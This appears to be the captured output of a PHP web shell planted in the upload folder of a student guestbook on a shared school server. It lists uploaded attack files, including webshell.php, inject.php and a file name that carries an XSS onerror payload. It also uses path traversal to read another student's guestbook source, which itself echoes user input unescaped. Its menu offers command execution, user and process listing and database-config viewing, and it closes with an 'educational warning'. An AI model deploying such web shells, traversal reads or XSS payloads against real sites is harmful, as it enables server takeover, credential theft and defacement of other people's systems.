🐚 WEB SHELL ACTIVATED

πŸ“ File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

πŸ“„ ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
πŸ“ ..
πŸ“„ 003b15869ae62d2ceeee451a5f652dd6.png [view]
πŸ“„ 0tk5j14v024b1.jpg [view]
πŸ“„ 300px-Cursed_Cat.jpg [view]
πŸ“„ 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
πŸ“„ Bill-Gates-Paul-Allen-2013.jpg [view]
πŸ“„ CV Jasper Kramp.png [view]
πŸ“„ Cat profile.png [view]
πŸ“„ Fronalpstock_big.jpg [view]
πŸ“„ Krik en las.jpg [view]
πŸ“„ Krik.jpg [view]
πŸ“„ Pino-dood-03.jpg [view]
πŸ“„ Shellz.php [view]
πŸ“„ Ted_Kaczynski_2_(cropped).jpg [view]
πŸ“„ Tux.svg.png [view]
πŸ“„ Z.png [view]
πŸ“„ android.jpg [view]
πŸ“„ apple.php [view]
πŸ“„ cianancatfish.jpg [view]
πŸ“„ downloads (1).jpeg [view]
πŸ“„ downloads.jpeg [view]
πŸ“„ epresso.jpg [view]
πŸ“„ fake_photo.png [view]
πŸ“„ hand.jpg [view]
πŸ“„ https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
πŸ“„ image.png [view]
πŸ“„ images.jpeg [view]
πŸ“„ info.php [view]
πŸ“„ inject.php [view]
πŸ“„ instant_redirect.jpg [view]
πŸ“„ japper.jpg [view]
πŸ“„ koekiemonster-3.jpg [view]
πŸ“„ logo.png [view]
πŸ“„ muis.jpg [view]
πŸ“„ people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
πŸ“„ picobellobv.jpeg [view]
πŸ“„ redirect.php [view]
πŸ“„ rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
πŸ“„ sdfsa.png [view]
πŸ“„ sneaky.svg [view]
πŸ“„ taylor.webp [view]
πŸ“„ test.html [view]
πŸ“„ testpreg.php [view]
πŸ“„ testpreg1.php [view]
πŸ“„ testtest.php.JPG [view]
πŸ“„ ultimate_attack.gif [view]
πŸ“„ ultimate_attack.php [view]
πŸ“„ ultimate_attack.svg [view]
πŸ“„ wallpaper.jpg [view]
πŸ“„ webshell.php [view]

πŸ“„ Viewing: ../../../../586246.klas4s23.mid-ica.nl/public_html/gast/index.php

<?php
include 'functions.php';

// Start de sessie
session_start();

// Controleer of er al een bericht is verzonden in de afgelopen minuut
if (isset($_SESSION['laatste_verzending']) && time() - $_SESSION['laatste_verzending'] < 60) {
    // Bereken hoeveel seconden er nog moeten worden gewacht
    $resterende_tijd = 60 - (time() - $_SESSION['laatste_verzending']);
    echo "<p>Je kunt pas weer een bericht versturen na $resterende_tijd seconden.</p>";
    $formulier_versturen = false; // Verberg het formulier
} else {
    // Toon het formulier om een nieuw bericht te versturen
    $formulier_versturen = true;

    // Bericht toevoegen als het formulier is ingediend
    if ($_SERVER["REQUEST_METHOD"] == "POST") {
        $naam = $_POST['naam'];
        $bericht = $_POST['bericht'];

        // Afbeelding uploaden als er een bestand is geselecteerd
        if (!empty($_FILES['afbeelding']['name'])) {
            $afbeelding = $_FILES['afbeelding']['name'];
            $targetDirectory = "assets/afbeeldingen/"; // Doelmap voor het opslaan van afbeeldingen
            $target_file = $targetDirectory . basename($_FILES["afbeelding"]["name"]);
            $uploadOk = 1;
            $imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));

            // Controleer of het bestand een afbeelding is
            $check = getimagesize($_FILES["afbeelding"]["tmp_name"]);
            if ($check !== false) {
                $uploadOk = 1;
            } else {
                echo "Bestand is geen afbeelding.";
                $uploadOk = 0;
            }

            // Controleer of het bestand al bestaat
            if (file_exists($target_file)) {
                echo "Sorry, het bestand bestaat al.";
                $uploadOk = 0;
            }

            // Controleer de bestandsgrootte
            if ($_FILES["afbeelding"]["size"] > 500000) {
                echo "Sorry, je bestand is te groot.";
                $uploadOk = 0;
            }

            // Toegestane bestandsformaten
            if ($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg" && $imageFileType != "gif") {
                echo "Sorry, alleen JPG, JPEG, PNG en GIF-bestanden zijn toegestaan.";
                $uploadOk = 0;
            }

            // Probeer het bestand te uploaden als alles in orde is
            if ($uploadOk == 1) {
                if (move_uploaded_file($_FILES["afbeelding"]["tmp_name"], $target_file)) {
                    // Datum toevoegen
                    $datum = date('d-m-Y H:i');
                    addBericht($naam, $bericht, $afbeelding, $datum); // Datum toegevoegd

                    // Markeer de tijd van de laatste verzending
                    $_SESSION['laatste_verzending'] = time();

                    echo "Het bestand " . htmlspecialchars(basename($_FILES["afbeelding"]["name"])) . " is succesvol geΓΌpload.";
                } else {
                    echo "Sorry, er was een probleem met het uploaden van je bestand.";
                }
            }
        } else {
            // Als er geen afbeelding is geΓΌpload, voeg alleen het bericht toe
            $datum = date('d-m-Y H:i');
            addBericht($naam, $bericht, "", $datum); // Datum toegevoegd

            // Markeer de tijd van de laatste verzending
            $_SESSION['laatste_verzending'] = time();

            echo "Bericht zonder afbeelding is succesvol toegevoegd.";
        }
    }
}
?>

<!DOCTYPE html>
<html lang="nl">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Gastenboek</title>
    <link rel="stylesheet" href="style.css">
</head>

<body>

    <div class="container">
        <h1>Gastenboek</h1>
        <a href="landingpage.php" class="terug-button">Terug naar de landingpagina</a>


        <!-- Formulier voor het toevoegen van een nieuw bericht -->
        <?php if ($formulier_versturen) { ?>
            <form action="<?php echo htmlspecialchars($_SERVER["PHP_SELF"]); ?>" method="post"
                enctype="multipart/form-data">
                <label for="naam">Naam:</label><br>
                <input type="text" id="naam" name="naam" required><br><br>

                <label for="bericht">Bericht:</label><br>
                <textarea id="bericht" name="bericht" rows="4" required></textarea><br><br>

                <label for="afbeelding">Afbeelding:</label><br>
                <input type="file" id="afbeelding" name="afbeelding"><br><br>

                <input type="submit" value="Plaats bericht">
            </form>
        <?php } else { ?>
            <p>Je hebt al een bericht verstuurd. Bedankt!</p>
        <?php } ?>

        <!-- Weergave van alle berichten -->
        <h2 id="berichten-heading">Recente berichten</h2> <!-- ID toegevoegd aan het berichten gedeelte -->
        <div class="berichten">
            <?php
            $berichten = getBerichten();
            foreach ($berichten as $bericht) {
                echo "<div class='bericht'>";
                echo "<p><strong>Naam:</strong> " . $bericht['naam'] . "</p>";
                echo "<p><strong>Datum:</strong> " . $bericht['datum'] . "</p>";
                echo "<p><strong>Bericht:</strong> " . $bericht['bericht'] . "</p>";
                if (!empty($bericht['afbeelding'])) {
                    echo "<img src='assets/afbeeldingen/" . $bericht['afbeelding'] . "' alt='Afbeelding'>";
                }
                echo "</div>";
            }
            ?>
        </div>

    </div>

</body>

</html>

🎯 Available Actions

Command Execution:

Quick Commands:

πŸ“‹ List files | πŸ‘€ Show user | πŸ“ Show directory | πŸ”„ Show processes | πŸ” Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | πŸ” View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!